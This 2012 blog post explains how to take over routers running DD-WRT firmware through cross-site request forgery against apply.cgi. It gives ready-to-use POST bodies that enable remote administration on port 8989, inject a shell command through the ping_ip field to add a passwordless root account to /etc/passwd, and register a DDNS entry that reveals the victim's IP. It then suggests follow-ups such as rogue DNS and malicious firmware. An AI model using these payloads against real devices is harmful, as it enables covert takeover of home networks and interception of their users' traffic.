Saturday, February 18, 2012

Attacking wireless routers running DD WRT

The previous post talks about CSRF attacks on DSL modems. A similar attack on routers with the dd wrt firmware is also possible. I will try a few different possibilities here which eventually lead to the attacker taking control of the router using a simple javascript hosted on another website.

All requests need to be made to the target "apply.cgi". Possible hosts can be 192.168.1.1, 192.168.0.1, 10.0.0.1, 10.0.1.1 and so on.


1. Enable remote http administration on port 8989

The following POST request needs to be made:

submit_button=Management&action=ApplyTake&remote_management=1&http_wanport=8989

2. Add a new user(outsider) to the system and set it's password as null
POST Request to add user every time the router reboots:

submit_button=Ping&action=Apply&submit_type=startup&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

POST Request to instantly add user(gets erased if when router reboots, hence to be used with previous POST request):

submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

3. Add a DDNS entry to obtain the public IP of the victim(incase the attack is targeted to a fixed public IP):
POST request if the DDNS provider is afraid.org:

submit_button=DDNS&action=ApplyTake&change_action=&submit_type=&ddns_enable=2&ddns_username_2=uname&ddns_passwd_2=passwrd&ddns_hostname_2=wrtvictim.net&ddns_wan_ip=0&ddns_force=1

* for different providers different values for the ddns_enable parameter can be tried. In the above case its afraid.org, username is uname, password is passed and the hostname is wrtvictim.net


Once an attacker has control over the router, other things can be done like setting up port forwarding rules, setting up a rogue DNS server for DHCP clients, setting it up as a VPN server/client, add access restrictions to prevent access to certain domains, setting up an identified host in the DMZ etc. Though I haven't tried yet, a modified firmware can also be uploaded on to the router using the upgrade functionality. If a connection over the remote port does not allow this, port forwarding can be setup to make the connection appear to originate from the LAN.
Posted by at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)